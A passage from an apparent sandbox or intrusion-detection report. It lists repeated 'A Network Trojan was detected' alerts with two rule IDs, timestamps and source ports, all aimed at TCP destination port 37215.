                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816908
                SID:2829579
                Source Port:50820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850234
                SID:2829579
                Source Port:34972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339092
                SID:2835222
                Source Port:46242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971313
                SID:2835222
                Source Port:57742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140769
                SID:2835222
                Source Port:57098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730736
                SID:2835222
                Source Port:39362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.769527
                SID:2829579
                Source Port:47816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964179
                SID:2829579
                Source Port:33630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612087
                SID:2835222
                Source Port:57726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275533
                SID:2829579
                Source Port:37166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782191
                SID:2829579
                Source Port:49286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436137
                SID:2829579
                Source Port:38404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933340
                SID:2835222
                Source Port:53308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988675
                SID:2835222
                Source Port:40514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162751
                SID:2835222
                Source Port:38118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.093946
                SID:2829579
                Source Port:56152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035058
                SID:2829579
                Source Port:32810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.387928
                SID:2829579
                Source Port:41256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.936438
                SID:2829579
                Source Port:60330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266438
                SID:2829579
                Source Port:56840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686747
                SID:2835222
                Source Port:40310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688992
                SID:2829579
                Source Port:55452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374385
                SID:2835222
                Source Port:47806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975976
                SID:2835222
                Source Port:50972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041328
                SID:2829579
                Source Port:41082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571069
                SID:2835222
                Source Port:49038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666991
                SID:2829579
                Source Port:35244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639729
                SID:2829579
                Source Port:32828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859276
                SID:2829579
                Source Port:36584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035080
                SID:2835222
                Source Port:59770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319456
                SID:2835222
                Source Port:37168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141877
                SID:2829579
                Source Port:55722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360381
                SID:2829579
                Source Port:48496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467394
                SID:2835222
                Source Port:57048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075183
                SID:2835222
                Source Port:35888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782729
                SID:2829579
                Source Port:60142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276197
                SID:2835222
                Source Port:43490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778306
                SID:2829579
                Source Port:46002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008614
                SID:2835222
                Source Port:46942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871633
                SID:2835222
                Source Port:51150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721938
                SID:2829579
                Source Port:60748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779846
                SID:2829579
                Source Port:60300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551353
                SID:2829579
                Source Port:38628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862789
                SID:2835222
                Source Port:43312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416652
                SID:2835222
                Source Port:45994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897611
                SID:2829579
                Source Port:39126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719949
                SID:2835222
                Source Port:40368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667395
                SID:2829579
                Source Port:50560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659912
                SID:2829579
                Source Port:36770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.236054
                SID:2835222
                Source Port:57218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885902
                SID:2829579
                Source Port:45632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267895
                SID:2835222
                Source Port:41188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502910
                SID:2835222
                Source Port:43154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557971
                SID:2829579
                Source Port:43636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154911
                SID:2835222
                Source Port:37300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.911137
                SID:2829579
                Source Port:55754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.794263
                SID:2835222
                Source Port:41794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.274518
                SID:2829579
                Source Port:58216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524393
                SID:2835222
                Source Port:48316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168748
                SID:2835222
                Source Port:48906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288170
                SID:2829579
                Source Port:36442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782882
                SID:2835222
                Source Port:43932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901004
                SID:2835222
                Source Port:53484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.230307
                SID:2829579
                Source Port:59024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141926
                SID:2829579
                Source Port:45860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659947
                SID:2829579
                Source Port:36360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.932516
                SID:2835222
                Source Port:45728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022047
                SID:2829579
                Source Port:43004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.814671
                SID:2835222
                Source Port:43368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228167
                SID:2835222
                Source Port:39322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111754
                SID:2829579
                Source Port:43698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860396
                SID:2829579
                Source Port:50314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331409
                SID:2835222
                Source Port:36200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887762
                SID:2829579
                Source Port:40562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519853
                SID:2829579
                Source Port:43588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722712
                SID:2835222
                Source Port:56628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236539
                SID:2835222
                Source Port:43026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531561
                SID:2829579
                Source Port:37960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155547
                SID:2829579
                Source Port:40912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586998
                SID:2835222
                Source Port:51696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071442
                SID:2835222
                Source Port:50718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787636
                SID:2835222
                Source Port:35444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860583
                SID:2829579
                Source Port:57770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520928
                SID:2829579
                Source Port:56742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.716294
                SID:2835222
                Source Port:55960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989889
                SID:2835222
                Source Port:54358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436448
                SID:2835222
                Source Port:47002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980175
                SID:2829579
                Source Port:36188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597122
                SID:2829579
                Source Port:43100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225527
                SID:2829579
                Source Port:52600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929665
                SID:2835222
                Source Port:33510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667152
                SID:2829579
                Source Port:38364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.587122
                SID:2829579
                Source Port:43240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.723486
                SID:2829579
                Source Port:41794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233766
                SID:2829579
                Source Port:38434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225526
                SID:2835222
                Source Port:46164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897333
                SID:2835222
                Source Port:40880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963907
                SID:2829579
                Source Port:33090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325103
                SID:2829579
                Source Port:47742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947669
                SID:2835222
                Source Port:57230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088580
                SID:2835222
                Source Port:58734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472062
                SID:2829579
                Source Port:36648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038192
                SID:2829579
                Source Port:46528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848608
                SID:2829579
                Source Port:47132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785924
                SID:2835222
                Source Port:48606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.913063
                SID:2835222
                Source Port:45980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261793
                SID:2829579
                Source Port:40274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915007
                SID:2835222
                Source Port:38314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.859944
                SID:2829579
                Source Port:41852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330615
                SID:2829579
                Source Port:39192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702042
                SID:2835222
                Source Port:34784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681944
                SID:2829579
                Source Port:46524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.434890
                SID:2835222
                Source Port:45704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326423
                SID:2835222
                Source Port:55780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.733318
                SID:2835222
                Source Port:39398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899532
                SID:2835222
                Source Port:48358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234936
                SID:2829579
                Source Port:59402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060816
                SID:2835222
                Source Port:48306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164967
                SID:2835222
                Source Port:48768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224296
                SID:2835222
                Source Port:55230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263731
                SID:2829579
                Source Port:52052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161625
                SID:2829579
                Source Port:58242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083474
                SID:2835222
                Source Port:49656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941639
                SID:2835222
                Source Port:38830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262465
                SID:2829579
                Source Port:37838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010528
                SID:2829579
                Source Port:48758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557656
                SID:2829579
                Source Port:60462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664069
                SID:2829579
                Source Port:38322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663422
                SID:2829579
                Source Port:35602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.397355
                SID:2835222
                Source Port:48266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660111
                SID:2835222
                Source Port:49266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668767
                SID:2829579
                Source Port:40202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.692215
                SID:2835222
                Source Port:57510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914573
                SID:2835222
                Source Port:53028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.145011
                SID:2829579
                Source Port:34990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931719
                SID:2829579
                Source Port:39216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962319
                SID:2835222
                Source Port:34568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262020
                SID:2829579
                Source Port:51566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664587
                SID:2829579
                Source Port:45904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502094
                SID:2829579
                Source Port:48290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290524
                SID:2829579
                Source Port:44762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834493
                SID:2835222
                Source Port:41102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652286
                SID:2829579
                Source Port:38662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728148
                SID:2835222
                Source Port:48214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175585
                SID:2835222
                Source Port:35892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209565
                SID:2829579
                Source Port:47512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886327
                SID:2835222
                Source Port:49764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855769
                SID:2835222
                Source Port:53364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612296
                SID:2835222
                Source Port:41850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675018
                SID:2829579
                Source Port:55084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.663758
                SID:2835222
                Source Port:51012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212886
                SID:2835222
                Source Port:34012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951616
                SID:2835222
                Source Port:44266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464595
                SID:2829579
                Source Port:42672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.712977
                SID:2829579
                Source Port:48122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462964
                SID:2829579
                Source Port:54714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990307
                SID:2835222
                Source Port:59662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667089
                SID:2835222
                Source Port:55154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785724
                SID:2829579
                Source Port:45932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015530
                SID:2835222
                Source Port:52960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521700
                SID:2835222
                Source Port:48474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472016
                SID:2829579
                Source Port:41322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362671
                SID:2835222
                Source Port:41342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.229929
                SID:2835222
                Source Port:48286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785689
                SID:2829579
                Source Port:42738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026706
                SID:2829579
                Source Port:35860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586370
                SID:2835222
                Source Port:33054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666310
                SID:2829579
                Source Port:53190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179085
                SID:2829579
                Source Port:43592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225350
                SID:2835222
                Source Port:46288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883059
                SID:2835222
                Source Port:43466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135862
                SID:2829579
                Source Port:44410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434908
                SID:2835222
                Source Port:55014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.475071
                SID:2835222
                Source Port:51978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.844110
                SID:2829579
                Source Port:51670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731879
                SID:2835222
                Source Port:41572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814793
                SID:2835222
                Source Port:50794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441547
                SID:2835222
                Source Port:42914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959705
                SID:2829579
                Source Port:51702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902960
                SID:2835222
                Source Port:46472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024379
                SID:2835222
                Source Port:43166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653126
                SID:2829579
                Source Port:42470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765654
                SID:2835222
                Source Port:40766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614134
                SID:2835222
                Source Port:36256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562079
                SID:2835222
                Source Port:35378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290464
                SID:2829579
                Source Port:44852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468609
                SID:2829579
                Source Port:36522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652738
                SID:2829579
                Source Port:40844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.224475
                SID:2829579
                Source Port:33732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504651
                SID:2829579
                Source Port:39818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422323
                SID:2829579
                Source Port:58618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322856
                SID:2829579
                Source Port:60308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966530
                SID:2835222
                Source Port:46826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763800
                SID:2835222
                Source Port:56596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785518
                SID:2829579
                Source Port:46356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369878
                SID:2835222
                Source Port:55878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.338901
                SID:2829579
                Source Port:52680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
